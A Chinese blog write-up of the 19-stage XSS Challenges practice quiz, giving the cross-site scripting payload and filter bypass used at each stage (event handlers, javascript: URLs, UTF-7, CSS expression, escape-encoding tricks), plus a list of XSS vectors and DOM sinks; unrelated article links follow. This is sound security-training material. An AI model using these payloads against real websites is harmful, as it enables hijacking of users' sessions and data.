xihuanqiqi
xihuanqiqi

2013 XSS Challenges Stage 解题报告

xss: http://xss-quiz.int21h.jp/

这是一个日本的孩子写得xss测试关卡,一共19关,对大神来说可能没什么。。

但是对我这个小菜来说,感觉学到了很多东西。。

在解题的过程中,特别感谢蓝蓝大神的倾心指导。。

这次过关,也算是对xss的一个入门吧。。


==========================================================

1.

http://xss-quiz.int21h.jp/?sid=2a75ff06e0147586b7ceb0fe68ee443b86a6e7b9

Hint: very simple...

用IE浏览器:

1"</b><script>alert(document.domain);</script><b>"1


2.

http://xss-quiz.int21h.jp/stage2.php?sid=f2d7d60125bdddb208fa757ee5cdae22f6818cd1
Hint: close the current tag and add SCRIPT tag...  

用IE浏览器:

1"</b><script>alert(document.domain);</script><b>"1


3.

http://xss-quiz.int21h.jp/stage-3.php?sid=3cd1eb9b27daae73478e861bb2476768d7dda3b1
Hint: The input in text box is properly escaped.    


被过滤 
<  <
>  >
&  &
"  "
个人觉得,从搜索这方面已经没法绕过了


表单源代码如下: 
<form action="?sid=ab369c5dddf10acefa8098e47b6c40b8400edf21" method="post">
Search a place: <input type="text" name="p1" size=30>
<input type="submit" value="Search">  
Choose a country: <select name="p2">
<option>Japan</option>
<option>Germany</option>
<option>USA</option>
<option>United Kingdom</option>
</select><hr class=red>We couldn't find any places called <b>"<>#&"</b> in <b>Japan</b>.<hr class=red></form>

听别的大神说要绕过select。。。
尝试绕过select,在浏览器地址栏输入: 
javascript:void(document.forms[0].p2.childNodes[1].innerText='<script>alert(document.domain)</script>');
OK


4.
http://xss-quiz.int21h.jp/stage_4.php?sid=04fb39847db7e3f24b1287a4be7e22b1ba79ec74
Hint: invisible input field

修改hackme的那个input的type为text,
在输入框中输入: 
"/><script>alert(document.domain);</script><a>"



5.
http://xss-quiz.int21h.jp/stage--5.php?sid=40b33710efa4a848d21b5a6dd47671e82c31d853
Hint: length limited text box

把maxlength=15改成:200
在输入框中输入: 
"/><script>alert(document.domain);</script><a>"




6.
http://xss-quiz.int21h.jp/stage-no6.php?sid=236f8f125f43d1efffd8f96d6f8f5b590d880847
Hint: event handler attributes

提示是:event handler attributes
英语不好,乍一看被这三个单词唬住了。。
后来翻阅资料才知道:
类似:<body onload="alert('xss')">
就是event handler attributes...

输入框输入: 
" onmousemove="alert(document.domain)

==================无聊别看==========================
Ps:
XSS利用的时候,分3大类

一、Features that allow scripting 特性 
Script tags: <script src="http://www.xxx.com/xss.js">
Event handler attributes: <body onload="alert('xss')">
CSS: <p style="background:url('javascript:alert(1)')">
URLs:<img src="javascript:alert('XSS')">

二、Proprietary extensions to HTML 私有拓展

XML data islands(IE) :
<xml src="http://www.xx.com/xss.xml" id="x">
<span datasrc="#x" datafld="c" dataformatas="html">


JavaScript expressions in attribute(NS4):
<p id="&{alert('XSS')}">


Conditional comments(IE)
<!--[if gte IE 4]>
<script>alert('XSS')</script>
<![endif]-->

三、浏览器bugs 
IE6 + UTF8:
<body foo="\xC0" bar=" onload=alert(1);//">


Firefox and IE7:
<body foo="?" 
      bar=" onload=alert(1);//">


IE6:
<body foo="? bar=" onload=alert(1);//">


Attribute parsing in Firefox < 2.0.0.2
<body onload!@#$@#%#@$^=alert("XSS")>

=====================================================


7.
http://xss-quiz.int21h.jp/stage07.php?sid=6fbeba7fd57ce51cf3bb463c8cae1da350722b2e
Hint: nearly the same... but a bit more tricky. 

" onmouseover=alert(document.domain)

这个能过纯属巧合。。
至今不知道服务器程序是怎么写得。。

目测是:等号两边加引号。。


8.
http://xss-quiz.int21h.jp/stage008.php?sid=b3d0fe99bca156329272fa022f49c556e0a30d80
Hint: the 'javascript' scheme.

百度了下:: the 'javascript' scheme.
然后出来: http://tools.ietf.org/html/draft-hoehrmann-javascript-scheme-03
Ctrl+F:scheme
搜到:As an example,
consider a HTML document containing a hyperlink like:
<a href='javascript:doSomething()'>...</a>
输入: 
javascript:alert(document.domain)

 
9.
http://xss-quiz.int21h.jp/stage_09.php?sid=aac40201929779e17453875d9d1ebf4ce706f56f
Hint: UTF-7 XSS

搜索下:utf7 xss ,这里有个文章 http://lcx.cc/?i=2862
这篇文章还有一个小工具(UTF-7编码解码工具)。。
Ps:大部分浏览器都修正了这个错误,但是IE还是有的。。 

" onmousemove="alert(document.domain)
转: 
+ACIAIABvAG4AbQBvAHUAcwBlAG0AbwB2AGUAPQAiAGEAbABlAHIAdAAoAGQAbwBjAHUAbQBlAG4AdAAuAGQAbwBtAGEAaQBuACk-
并且修改charset为type=text,输入:UTF-7
回车,OK


10.
http://xss-quiz.int21h.jp/stage00010.php?sid=6e00f25c30db1832340f83e614b48b2c40290cdb
Hint: s/domain//g;

乍一看觉得是linux的替换命令。。
应该是正则表达式,那么domain可以替换成:domaidomainn,中间的一个domain会被替换成NULL,那么就剩下一个domain 
a" onmouseover="alert(document.domaidomainn)"



11.
http://xss-quiz.int21h.jp/stage11th.php?sid=16da532d066ad4f9e66404d40e1a7773667e7a5d

Hint: "s/script/xscript/ig;" and "s/on[a-z]+=/onxxx=/ig;" and "s/style=/stxxx=/ig;"


a" onmouseover="alert(document.domain)   ERROR

"s/script/xscript/ig;" and "s/on[a-z]+=/onxxx=/ig;" 这两个东西会死一大批。。
说明不要局限到这个input框里面,要调到js的代码中。。
这是看别人的答案做出来的:
结果还是用 
"><a href="javascr	ipt:alert(document.domain);">xss</a>"><a

&#x09; 是什么呢?
请查表:
http://blog.csdn.net/xihuanqiqi/article/details/16986259
============无聊别看================= 
	        &#09;	&#x09;	Horizontal Tab
 	 	&#10;	&#x10;	Line Feed
 	 	&#32;	&#x20;	Space
===========================================
好吧,那为什么同样是HTML的转义, 
a" on&#x09;mouseover="alert(document.domain)
就不行呢?
做了个小实验: 
a" on&#x09;mouseover="&#x09;alert(document.domain)
发现括号内的有效,
猜想:这个HTML的转义应该是针对字符串的啦~~
总结:以后尽量把结果引向<a href="">


12.
http://xss-quiz.int21h.jp/stage_no012.php?sid=6400cfbbdc76260ee1b744a70ece4457cc51656e
Hint: "s/[\x00-\x20\<\>\"\']//g;"

额,这个特别狠毒。。
把x00-x20的给过滤了。。
把<,>给过滤了。。
把单引号,双引号,给过滤了。。 
`` onmousemove=alert(document.domain)
这个必须IE下!!!``,就是笔记本上数字1左边的那个键,shirt下是它,非shirt是波浪线。。
只有IE才有这个特性。。
可以把这个value给闭合。。而不是value后全部是字符串。。


13.
http://xss-quiz.int21h.jp/stage13_0.php?sid=612cba01e3c41307770cc941435ab36ac836cc68

Hint: style attribute 

如何在CSS样式中利用expression实现JavaScript中的onmouseover/onmouseout事件 

aa:expression(onmouseover=function(){alert(document.domain)})
在CSS样式中注入这段代码就能弹了。。
但是现实环境中怎么可能有如此简单就能插入的地方。。
很难找到的说。。
话说,现实中怎么利用呢?
有2种注入:
(1)@import 和 expression 
@import "http://web/xss.css"
@import 'javascript:alert("xss")'
body{xss:expression(alert('xss'))]
<img style="xss:expression(alert('xss'))">

(2)css代码中js,vs脚本 
body{backgroud-image:url(javascript:alert('xss'))}
body{backgroud-image:url(vbscript:msgbox('xss'))}


14.
http://xss-quiz.int21h.jp/stage-_-14.php?sid=0ccb3bac891178e3bd1966b5624529302f5efcf0
Hint: s/(url|script|eval|expression)/xxx/ig;   

aa:expression(onmouseover=function(){alert(document.domain)})
有4种能绕过正则过滤:
(1)e -> \0065  
aa:\0065xpression(onmouseover=function(){alert(document.domain)})   ERROR
(2)加入\隔断 
aa:e\xpression(onmouseover=function(){alert(document.domain)})         ERROR
(3)加入\0隔断 
aa:e\0xpression(onmouseover=function(){alert(document.domain)})       OK
(4)加入\**\隔断 
aa:e\**\xpression(onmouseover=function(){alert(document.domain)})    ERROR

补充,有一天看到了别人的答案,吓了一跳。。 
xss:expre/**/ssion(window.x?0:(alert(document.domain),window.x=1));

莫非我的第四点错了?
改成
(4)加入/**/断 
aa:e/**/xpression(onmouseover=function(){alert(document.domain)})    OK


15.
http://xss-quiz.int21h.jp/stage__15.php?sid=ad5047a9726b236d7a5d2ab3aef227f779c61555
Hint: document.write();  
<script>alert(document.domain);</script>
发现题目把
<变成了&lt;
>变成了&gt;
怎么绕过<和>呢?
16进制编码:
< 变成了 \x3c 
> 变成了 \x3e 
\x3cscript\x3ealert(document.domain);\x3c/script\x3e  ERROR
过滤了单个\ 
\\x3cscript\\x3ealert(document.domain);\\x3c/script\\x3e  OK


16.
http://xss-quiz.int21h.jp/stage00000016.php?sid=4ba92c2b20cd3b70e153bf21a63f21391fe8d589
Hint: "document.write();" and "s/\\x/\\\\x/ig;"  

这个正则摆明了就是要吃掉16进制,我们换其他的表达方式:十进制\60, \u003c
为什么这里要两个\\,是为了在写我们插入的代码的时候换一个\ 
\\60script\\62alert(document.domain);\\60/script\\62                       ERROR 
\\0060script\\0062alert(document.domain);\\0060/script\\0062        ERROR
\\u003cscript\\u003ealert(document.domain);\\u003c/script\\u003e  OK

在这里把能引起Dom XSS的入口函数总结下: 
document.write()  
document.writeln()  
document.body.innerHtml  
eval()  
window.execScript()  
window.setInterval()  
window.setTimeout()


17.
http://xss-quiz.int21h.jp/stage-No17.php?sid=ba90ec457c25fad90c2715a86fe3a07be846dc7f
Hint: multi-byte character

半角片假名使用两个字节来表示。 
“第一位字节”使用0x8E
“第二位字节”使用0xA1-0xDF

JIS X 0208字元使用两个字节来表示。 
“第一位字节”使用0xA1-0xFE
“第二位字节”使用0xA1-0xFE

JIS X 0212字元使用三个字节来表示。 
“第一位字节”使用0x8F
“第二位字节”使用0xA1-0xFE
“第三位字节”使用0xA1-0xFE

双引号是0x22,这道题应该在Name框中使用某个东东吃掉Name框第二个“
然后和Mail框的第一个“闭合
看了下别人的答案,思路都差不多:
最终效果: 
1%A7&p2=+onmouseover%3Dalert%28document.domain%29%3B+%A7
但是版本问题,没法显示。。


Ps:楼上的%A7,是要抓包,修改的,而不是在请求的时候修改,记得把length修改对。

Ps:楼上的%A7,是随意的,只要是符合上面说的第一个字节范围即可。。


18.

http://xss-quiz.int21h.jp/stage__No18.php?sid=4293f3e546c32c4dc375b8063896254e64fc9198
Hint: us-ascii high bit issue

本来没什么思路,看了下别人的答案,大概知道了:

就是把最高位置为1即可

比如说:

< 的16进制是3C,2进制是0011 1011,最高位置为1之后,变成1011 1011 ,也就是BC

> 同理变成BE

“ 同理变成A2

所以:

"><script>alert(document.domain)</scirpt>

就变成:

%A2%BE%BCscript%BEalert(document.domain);%BC/script%BE

Ps:这里我的高版本IE又一次失败了,蓝蓝大神的IE6成功了。。



你可能感兴趣的:(2013 XSS Challenges Stage 解题报告)

  • 《策划经理回忆录之二》 路基雅虎
    话说三年变六年,飘了,飘了……眨眼,2013年5月,老吴回到了他的家乡——油城从新开启他的工作幻想症生涯。很庆幸,这是一家很有追求,同时敢于尝试的,且实力不容低调的新星房企——金源置业(前身泰源置业)更值得庆幸的是第一个盘就是油城十路的标杆之一:金源盛世。2013年5月,到2015年11月,两年的陪伴,迎来了一场大爆发。2000个筹,5万/筹,直接回笼1个亿!!!这……让我开始认真审视这座看似五线
  • pyecharts——绘制柱形图折线图 2224070247 信息可视化pythonjava数据可视化
    一、pyecharts概述自2013年6月百度EFE(ExcellentFrontEnd)数据可视化团队研发的ECharts1.0发布到GitHub网站以来,ECharts一直备受业界权威的关注并获得广泛好评,成为目前成熟且流行的数据可视化图表工具,被应用到诸多数据可视化的开发领域。Python作为数据分析领域最受欢迎的语言,也加入ECharts的使用行列,并研发出方便Python开发者使用的数据
  • 【穿过丛林看见你】2015年在《诗歌报》读诗日记(一) 快快_ce70
    写完《三月的领土》和《手握一把锄头,在翻动诗歌的春天》之后,安稳的睡了个好觉,这是从2013年的五月之后,第一次睡的如此安稳和香甜。其实这对于我来说,也没有什么特别的意义和变故,就像我现在的生活在人人忙着踏青、写生、拍照的春天。在我脚下,没有领土的完整,也没有加剧的破碎。我曾经和现在都是个辛勤的“蜂农”,在这样一个角色里,尽管有人盗走了我所有的蜜,但不妨碍我对甜蜜的不懈追求和喜爱。翻开最近的阅读笔
  • 《度五行》生活报报甲午62:不通痛苦,太通也痛苦,要健康快乐,需要通体舒畅。 YangduSam2021
    220809壬寅戊申甲午,《度.生活五行》:天干土克水,水生木,木克土。地支寅申冲,寅午合。20220809,周二,兴大上海六班2512天,西交大2013上海班3212天,后TA15332天,度生活619天,今天拜访了一家有趣且当红产业的新创公司AK。AK一开始从事深海新能源储存与供电设备的研发生产制造,2年前开始做移动与家庭储能设备的研发生产制造。觉得有趣是因为这是笔者认知里用科技做降维打击的公
  • Some jenkins settings SnC_
    Jenkins连接到特定gitlabproject的特定branch我采用的方法是在pipeline的script中使用git命令来指定branch。如下:stage('Clonerepository'){steps{gitbranch:'develop',credentialsId:'gitlab-credential-id',url:'http://gitlab.com/repo.git'}}
  • 《Veronika decides to die》 Ooutstanding
    Whatismadness?——Madnessistheinabilitytocommunicate.Betweennormalityandmadness,whicharebasicallythesamething,thereexistsanintermediarystage:itiscalled"beingdifferent."Andpeoplewerebecomingmoreandmoreaf
  • [移动端自动化] AppAgent介绍 大卫软件测试 自动化
    AUITestAgentAUITestAgent/README_zh.mdatmain·bz-lab/AUITestAgent(github.com)1/MobileAgentX-PLUG/MobileAgent:Mobile-Agent:ThePowerfulMobileDeviceOperationAssistantFamily(github.com)2/AppAgentAppAgent/RE
  • talib的python库安装 jesonwz python开发语言
    talib的python库安装反正用清华源装不上发现talib的指标好多,想着用用,结果在python里装不上,清华源里提示找不到。也难怪,这个库上网查了一下,最新一次更新是在2013年,太老了。废话不说,上我的解决办法。解决方法步骤(靠谱的)思路:既然在线装不上,就用离线的1.下载对应python版本的talib的whl版本安装文件,链接在这:https://blog.csdn.net/FL16
  • ⭐算法入门⭐《归并排序》简单01 —— LeetCode 21. 合并两个有序链表 英雄哪里出来 《LeetCode算法全集》算法数据结构链表c++归并排序
    饭不食,水不饮,题必须刷C语言免费动漫教程,和我一起打卡!《光天化日学C语言》LeetCode太难?先看简单题!《C语言入门100例》数据结构难?不存在的!《数据结构入门》LeetCode太简单?算法学起来!《夜深人静写算法》文章目录一、题目1、题目描述2、基础框架3、原题链接二、解题报告1、思路分析2、时间复杂度3、代码详解三、本题小知识一、题目1、题目描述  将两个不降序链表合并为一个新的不降
  • Docker学习十一:Kubernetes概述 爱打羽球的程序猿 Docker学习系列dockerkubernetes学习
    一、Kubernetes简介2006年,Google提出了云计算的概念,当时的云计算领域还是以虚拟机为代表的云平台。2013年,Docker横空出世,Docker提出了镜像、仓库等核心概念,规范了服务的交付标准,使得复杂服务的落地变得更加简单,之后Docker又定义了OCI标准,Docker在容器领域称为事实的标准。但是,Docker诞生只是帮助定义了开发和交付标准,如果想要在生产环境中大批量的使
  • 洛谷P1719 最大加权矩形 0hang 算法c++开发语言
    洛谷P1719最大加权矩形题目描述为了更好的备战NOIP2013,电脑组的几个女孩子LYQ,ZSC,ZHQ认为,我们不光需要机房,我们还需要运动,于是就决定找校长申请一块电脑组的课余运动场地,听说她们都是电脑组的高手,校长没有马上答应他们,而是先给她们出了一道数学题,并且告诉她们:你们能获得的运动场地的面积就是你们能找到的这个最大的数字。校长先给他们一个n\timesnn×n矩阵。要求矩阵中最大加
  • 【HR论道】员工辞职未提前通知,要赔公司损失吗? 树袋熊不是树呆熊
    【HR论道】员工辞职未提前通知,要赔公司损失吗?易先生在A公司担任项目工程师,最后一份劳动合同期限为2010年7月1日起至2013年6月30日。2013年3月25日,易先生向公司递交书面辞职申请,称因个人原因申请辞职,并要求于当天办理离职手续。A公司收到易先生的离职申请后对其要求当天离职表示不同意,要求其在30天后离职,并妥善完成某剧院的音响工程调试工作。易先生对公司的态度未予理会,此后未再上班,
  • BZOJ 五月胡乱补题 nike0good 其他屯题bzoj博客补档
    旧博客搬运部分格式还没来得及改T_T【BZOJ4806:炮】同BZOJ1801【BZOJ3242:[Noi2013]快餐店】树形dp,要么最远点在同一颗树上(dp),要么在不同树上,此时答案=去掉任何一条边后形成的树的答案的最小值,我们枚举去掉的那条边。由于答案=s[i]-s[j]+dis[i]+dis[j],i,j可以分开考虑,也可以用线段树解决。【BZOJ4878:[Lydsy2017年5月月
  • 今年的目标 草莓香猪
    今天对我从2015年到2020年的经历做了个回顾,自己也学习了很多。2013年到现在开始学习佛法,一直持续到现在2015年学习了理疗瑜伽师的课程,拿到证书。2016年开启了亲子阅读的课程,亲子阅读初级班。2017年亲子阅读课中级班2018年亲子阅读课程高级班,年底担任罗湖站站长2019年参加洋葱阅读的快速阅读课程2020年参加健康管理师课程,拿到三级健康管理师证书。2017-2019年还在管着家里
  • ABC371 解题报告(A-E) Plossom 赛后总结深度优先算法c++贪心算法图论性能优化
    A题意给定A,B之间,B,C之间,A,C之间的不等关系(大于或小于),问A,B,C中排第二大的数是哪一个。解法乍一看没啥思路,原来正解是打表(8种情况秒了)。   if(a==""){     cout"&&c==""&&c==">"){     cout"&&b==""&&b==""){     cout"&&b==">"&&c==""&&b==">"&&c==">"){     cout>n>
  • java mongodb group分组使用 yank1225 mongodbjavamongodbgroup
    mongodb的关键字及介绍.mongodb的查询是有一定规则的,刚开始接触老是各种错误,参照以下内容有很多帮助https://docs.mongodb.com/manual/reference/sql-aggregation-comparison/另外出现这种错误时Apipelinestagespecificationobjectmustcontainexactlyonefield是因为条件不对
  • Prism 教程 yang_B621 PrismIOC
    http://t.csdnimg.cn/VXSSvhttps://blog.csdn.net/u010476739/article/details/119341731Prism-随笔分类-Hello——寻梦者!-博客园(cnblogs.com)C#IoC学习笔记-缥缈的尘埃-博客园(cnblogs.com)WPF_SchuylerEX的博客-CSDN博客
  • Apache POI用法 JH3073 apache
    一、ApachePOI是什么ApachePOI是用Java编写的免费开源的跨平台的JavaAPI,ApachePOI提供API给Java程序对MicrosoftOffice格式档案读和写的功能,其中使用最多的就是使用POI操作Excel文件。二、POI结构HSSF-提供读写MicrosoftExcelXLS格式档案的功能XSSF-提供读写MicrosoftExcelOOXMLXLSX格式档案的功能
  • Upstage 将发布新一代 LLM “Solar Pro “预览版 吴脑的键客 人工智能人工智能
    SolarPro是最智能的LLM,经过优化可在单GPU上运行,性能超过微软、Meta和谷歌等科技巨头的模型。加州圣何塞2024年9月11日电/美通社/–Upstage今天宣布发布其下一代大型语言模型(LLM)SolarPro的预览版。加州圣何塞2024年9月11日电/美通社/–Upstage今天宣布发布其下一代大型语言模型(LLM)SolarPro的预览版。该预览版作为开源模型免费提供API访问,
  • 宫崎骏系列电影:《你想活出怎样的人生》观后感 AR7_ 程序人生
    1回想宫崎骏上一部上映的电影,已经是2013年,距今已有十一年之久,那时在唐山的网吧里,在微博偶然刷到了《起风了》的预告片,一开始就被主题曲《ひこうき雲》轻快动听的旋律吸引住了,加上当时的说法是,这部《起风了》应该是收官之作了,所以当时情绪很复杂,既有期待又有不舍,不像《你想活出怎样的人生》,只是隐约看到一两则新闻,其他没有过多关注,虽然也有说是告别之作,但是竟没觉得有何特别之处,心态还是很坦然的
  • 两天了,女儿终于便便了,可问题又来了 2013-7-28 14:09 甘怀
    两天了,女儿终于便便了,可问题又来了2013-7-2814:09连续两天女儿没大便,口强的奶奶也着急了。我更急。我上网,要多喝水,喝苹果汁…我不失时机给女儿补充水,因为我太知道大便辛苦的痛苦了,我月子里几乎合天天大便辛苦。昨晚,女儿睡着不大会,就急醒憋醒了,满脸通红,两脚乱登,吵闹好久,我心疼死了。今早,我给婆婆说苹果汁的事,她欣然答应说好办。把苹果切薄片,放塑料带里用刀拍出汁即可。还是老姜辣!我
  • 为什么新媒体公司招人这么难? 公子义
    又是一年春来到,为什么新媒体招一个人那么难?到底难在哪里?作为企业这是非常关心的话题,到底是什么原因呢?新媒体运营公子义2013年开始研究新媒体,从公众号,微博,到公众号、今日头条、百家号、大鱼号,4年下来面试过不下七八十人,但是真的招聘这么难吗?事实上真的招人难和用人难吗?结合4年你新媒体运营和面试求职者说一点自己的想法!一、招聘平台宣传造势,以招人难吸引求职者。现在是移动互联网时代,求职者找工
  • iOS 多视图UIView左右来回滑动切换效果 Andyjicw iOS移动开发ios滑动uiview效果
    多视图页面左右来回滑动切换效果!////ViewController.h//demoA0////Createdbyyuhangon13-2-18.//Copyright(c)2013年yuhang.Allrightsreserved.//#import#defineViewNumber10@interfaceViewController:UIViewController{UIView*dwView
  • 9- 【JavaWeb】JavaScript 基础 weixin_44329069 JavaWebjavascript开发语言ecmascript
    1.基本语法变量声明JavaScript中可以使用var、let和const来声明变量。var是旧的方式,let和const是较新的方式,通常推荐使用let和const。//使用let声明的变量可以被重新赋值letname="Alice";name="Bob";//使用const声明的变量不能被重新赋值constage=25;//age=30;//这将导致错误console.log(name);/
  • 【727】幼儿园亲子阅读之《这不是我的帽子》 登登一君
    我是昭君,我想记录我生活工作的点点滴滴,今天是我每日一篇文章的第727天。《这不是我的帽子》这本书获得了2013年凯迪克金奖、2014年凯特·格林纳威奖、美国图书馆学会年度最佳童书、美国《纽约时报》年度最佳童书、美国学校图书馆期刊年度最佳图书等19项大奖。绘本的作者乔恩·克拉森来自美国,是一位知名的插画师和设计师,他也有过动画电影的工作经历,所以整个绘本就好像是用电影的手法来讲故事。封面上赫然出现
  • 近些年NBA总决赛,细数让人遗憾的事,还属13年的最为可惜! 陈晖篮球
    NBA这项竞技体育的魅力,遗憾肯定是其中的一部分,几乎每年的总决赛都会有些故事,但细数近些年的,还属13年的那届最为可惜。三十支球队对于NBA总冠军的渴望,从开始到大比分拿到“4”之前一切皆有可能,而在最后的总决赛上,总会有一些让人觉得遗憾的事。回顾近些年的NBA总决赛,2019年有,2018年也有,而2016年和2013年又是让人觉得尤为可惜。2013年NBA总决赛G6常规时间最后一刻,热火队球
  • spark常见面试题 爱敲代码的小黑 spark大数据分布式
    文章目录1.Spark的运行流程?2.Spark中的RDD机制理解吗?3.RDD的宽窄依赖4.DAG中为什么要划分Stage?5.Spark程序执行,有时候默认为什么会产生很多task,怎么修改默认task执行个数?6.RDD中reduceBykey与groupByKey哪个性能好,为什么?7.SparkMasterHA主从切换过程不会影响到集群已有作业的运行,为什么?8.SparkMaster使
  • 牛客周赛 Round 13 解题报告 | 珂学家 | 乘法原理场 + BFS上组合 + 众数贪心 Buoluochuixue java
    题解|#简单计算器##includeintmain(){doublea,b;charoperate;scanf(&迈瑞医疗一面等了面试官十几分钟,更气人在后面上来自我介绍完了就让开始做题。。。题不算很难,做完了之后,讲了下思路,后面根据简历提问。一分钟简单介绍下实习做的东西,我说到一半经纬恒润Java开发一面时长:35min1.聊项目2.gc3.线程共享私有4.类加载过程5.I/O相关6.Spri
  • 2019-06-03 苏琳Sophia
    爸爸对我说梦梦,2013年,因为你的到来,家里有了你和哥哥两个小朋友,爸爸妈妈也成为了亲戚朋友们最羡慕的人。刚出生的你小小的,大家让爸爸抱你一下我都几分钟没下去手,害怕把你弄疼。那时候因为黄疸消退的慢,医生安排你照蓝光,大大的眼罩盖住了你的鼻子,怕影响你呼吸,爸爸捏着眼罩陪你照了十几个小时,手酸了就换一只,妈妈和爷爷奶奶都觉得爸爸从来没对他们这么细心过。时间过得很快,三岁的你被爸爸妈妈带到了杭州,
  • 大数据行业发展进步的原动力是什么? 丨程序之道丨
    大数据时代,数据源是大数据行业发展进步的原动力,是行业内获得竞争力的核心资本。数据源的保有量叠加开发应用能力,将奠定大数据公司的市场地位。中国大数据产业自2013年前后日趋活跃至今,已表现出异彩纷呈、百花齐放的发展态势。在互联网业内,腾讯、百度、阿里巴巴为代表的行业领头羊,将积累的社交数据、搜索数据、电商数据转化为大数据时代珍贵的原生素材。在电信行业,中国移动、中国联通、中国电信三大巨头的通讯数据
  • springmvc 下 freemarker页面枚举的遍历输出 杨白白 enumfreemarker
    spring mvc freemarker 中遍历枚举 1枚举类型有一个本地方法叫values(),这个方法可以直接返回枚举数组。所以可以利用这个遍历。 enum public enum BooleanEnum { TRUE(Boolean.TRUE, "是"), FALSE(Boolean.FALSE, "否");
  • 实习简要总结 byalias 工作
    来白虹不知不觉中已经一个多月了,因为项目还在需求分析及项目架构阶段,自己在这段 时间都是在学习相关技术知识,现在对这段时间的工作及学习情况做一个总结: (1)工作技能方面 大体分为两个阶段,Java Web 基础阶段和Java EE阶段 1)Java Web阶段 在这个阶段,自己主要着重学习了 JSP, Servlet, JDBC, MySQL,这些知识的核心点都过 了一遍,也
  • Quartz——DateIntervalTrigger触发器 eksliang quartz
    转载请出自出处:http://eksliang.iteye.com/blog/2208559 一.概述 simpleTrigger 内部实现机制是通过计算间隔时间来计算下次的执行时间,这就导致他有不适合调度的定时任务。例如我们想每天的 1:00AM 执行任务,如果使用 SimpleTrigger,间隔时间就是一天。注意这里就会有一个问题,即当有 misfired 的任务并且恢复执行时,该执行时间
  • Unix快捷键 18289753290 unixUnix;快捷键;
    复制,删除,粘贴: dd:删除光标所在的行                             &nbs
  • 获取Android设备屏幕的相关参数 酷的飞上天空 android
    包含屏幕的分辨率  以及 屏幕宽度的最大dp 高度最大dp   TextView text = (TextView)findViewById(R.id.text); DisplayMetrics dm = new DisplayMetrics(); text.append("getResources().ge
  • 要做物联网?先保护好你的数据 蓝儿唯美 数据
    根据Beecham Research的说法,那些在行业中希望利用物联网的关键领域需要提供更好的安全性。 在Beecham的物联网安全威胁图谱上,展示了那些可能产生内外部攻击并且需要通过快速发展的物联网行业加以解决的关键领域。 Beecham Research的技术主管Jon Howes说:“之所以我们目前还没有看到与物联网相关的严重安全事件,是因为目前还没有在大型客户和企业应用中进行部署,也就
  • Java取模(求余)运算 随便小屋 java
            整数之间的取模求余运算很好求,但几乎没有遇到过对负数进行取模求余,直接看下面代码: /** * * @author Logic * */ public class Test { public static void main(String[] args) { // TODO A
  • SQL注入介绍 aijuans sql注入
    二、SQL注入范例 这里我们根据用户登录页面 <form action="" > 用户名:<input type="text" name="username"><br/> 密 码:<input type="password" name="passwor
  • 优雅代码风格 aoyouzi 代码
    总结了几点关于优雅代码风格的描述: 代码简单:不隐藏设计者的意图,抽象干净利落,控制语句直截了当。 接口清晰:类型接口表现力直白,字面表达含义,API 相互呼应以增强可测试性。 依赖项少:依赖关系越少越好,依赖少证明内聚程度高,低耦合利于自动测试,便于重构。 没有重复:重复代码意味着某些概念或想法没有在代码中良好的体现,及时重构消除重复。 战术分层:代码分层清晰,隔离明确,
  • 布尔数组 百合不是茶 java布尔数组
      androi中提到了布尔数组;   布尔数组默认的是false,  并且只会打印false或者是true   布尔数组的例子;  根据字符数组创建布尔数组 char[] c = {'p','u','b','l','i','c'}; //根据字符数组的长度创建布尔数组的个数 boolean[] b = new bool
  • web.xml之welcome-file-list、error-page bijian1013 javaweb.xmlservleterror-page
    welcome-file-list 1.定义: <welcome-file-list> <welcome-file>login.jsp</welcome> </welcome-file-list>  2.作用:用来指定WEB应用首页名称。   error-page1.定义: <error-page&g
  • richfaces 4 fileUpload组件删除上传的文件 sunjing clearRichfaces 4fileupload
     页面代码               <h:form id="fileForm">            <rich:
  • 技术文章备忘 bit1129 技术文章
    Zookeeper http://wenku.baidu.com/view/bab171ffaef8941ea76e05b8.html http://wenku.baidu.com/link?url=8thAIwFTnPh2KL2b0p1V7XSgmF9ZEFgw4V_MkIpA9j8BX2rDQMPgK5l3wcs9oBTxeekOnm5P3BK8c6K2DWynq9nfUCkRlTt9uV
  • org.hibernate.hql.ast.QuerySyntaxException: unexpected token: on near line 1解决方案 白糖_ Hibernate
    文章摘自:http://blog.csdn.net/yangwawa19870921/article/details/7553181   在编写HQL时,可能会出现这种代码: select a.name,b.age from TableA a left join TableB b on a.id=b.id  如果这是HQL,那么这段代码就是错误的,因为HQL不支持
  • sqlserver按照字段内容进行排序 bozch 按照内容排序
    在做项目的时候,遇到了这样的一个需求:           从数据库中取出的数据集,首先要将某个数据或者多个数据按照地段内容放到前面显示,例如:从学生表中取出姓李的放到数据集的前面;          select * fro
  • 编程珠玑-第一章-位图排序 bylijinnan java编程珠玑
    import java.io.BufferedWriter; import java.io.File; import java.io.FileWriter; import java.io.IOException; import java.io.Writer; import java.util.Random; public class BitMapSearch {
  • Java关于==和equals chenbowen00 java
    关于==和equals概念其实很简单,一个是比较内存地址是否相同,一个比较的是值内容是否相同。虽然理解上不难,但是有时存在一些理解误区,如下情况: 1、 String a = "aaa"; a=="aaa"; ==> true 2、 new String("aaa")==new String("aaa
  • [IT与资本]软件行业需对外界投资热情保持警惕 comsci it
          我还是那个看法,软件行业需要增强内生动力,尽量依靠自有资金和营业收入来进行经营,避免在资本市场上经受各种不同类型的风险,为企业自主研发核心技术和产品提供稳定,温和的外部环境...       如果我们在自己尚未掌握核心技术之前,企图依靠上市来筹集资金,然后使劲往某个领域砸钱,然
  • oracle 数据块结构 daizj oracle数据块块结构行目录
    oracle 数据块是数据库存储的最小单位,一般为操作系统块的N倍。其结构为: 块头--〉空行--〉数据,其实际为纵行结构。 块的标准大小由初始化参数DB_BLOCK_SIZE指定。具有标准大小的块称为标准块(Standard Block)。块的大小和标准块的大小不同的块叫非标准块(Nonstandard Block)。同一数据库中,Oracle9i及以上版本支持同一数据库中同时使用标
  • github上一些觉得对自己工作有用的项目收集 dengkane github
    github上一些觉得对自己工作有用的项目收集 技能类 markdown语法中文说明 回到顶部 全文检索 elasticsearch bigdesk elasticsearch管理插件 回到顶部 nosql mapdb 支持亿级别map, list, 支持事务. 可考虑做为缓存使用 C
  • 初二上学期难记单词二 dcj3sjt126com englishword
    dangerous 危险的 panda 熊猫 lion 狮子 elephant 象 monkey 猴子 tiger 老虎 deer 鹿 snake 蛇 rabbit 兔子 duck 鸭 horse 马 forest 森林 fall 跌倒;落下 climb 爬;攀登 finish 完成;结束 cinema 电影院;电影 seafood 海鲜;海产食品 bank 银行
  • 8、mysql外键(FOREIGN KEY)的简单使用 dcj3sjt126com mysql
